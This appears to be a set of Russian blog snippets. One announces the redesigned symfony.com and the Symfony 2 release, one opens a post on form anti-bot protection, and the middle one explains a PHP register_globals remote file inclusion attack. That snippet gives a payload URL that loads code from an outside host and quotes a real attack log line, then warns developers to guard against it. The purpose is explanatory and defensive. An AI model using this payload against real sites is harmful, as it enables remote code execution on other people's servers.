symfony.com
Хотя он еще не до конца доделан, но систематизация информации на нем, как и дизайн, намного лучше, чем на предыдущем сайте. Так же обратите внимание на выпадающий список SensioLabs Network в верхнем левом углу, где в одном месте собраны ссылки на их основные сайты, теперь на сайт доктрины или свифта можно перейти намного проще.

P.S. Наконец дождались, официальный релиз симфонии 2 обещают завтра http://symfony.com/download

Недавно познакомился с относительно новой идеей хака для включенных register_globals:
если в коде есть include_once($_SERVER['DOCUMENT_ROOT']."file.php")то
нам достаточно передать строчку вида: "/?_SERVER[DOCUMENT_ROOT]=http://hacksite/hackcode.txt?" чтобы произошла подстановка и выполнение нашего скрипта на сайте потребителя.

41.210.32.69 - - [15/Feb/2009:16:32:00 +0300] "POST /?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt? HTTP/1.0" 200 22054 "http://www.mysite.ru//?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"

Мораль сей басни стара: будьте внимательны и не позволяйте формировать любой запрос через передаваемые параметры.
UPD: Уточняю, уже существует бот на скан подобной уязвимости, и данный лог — реальный, изменен только сайт, с которого этот лог взят, так что это не просто теоретическая уязвимость.

Сейчас на хабре стала очень популярной тема защиты форм от ботов. У меня сложилось впечатление, что большинство писателей не до конца представляют себе эту задачу. Здесь я попытаюсь дать краткий обзор проблем встающих перед разработчиками и некоторые варианты их решения.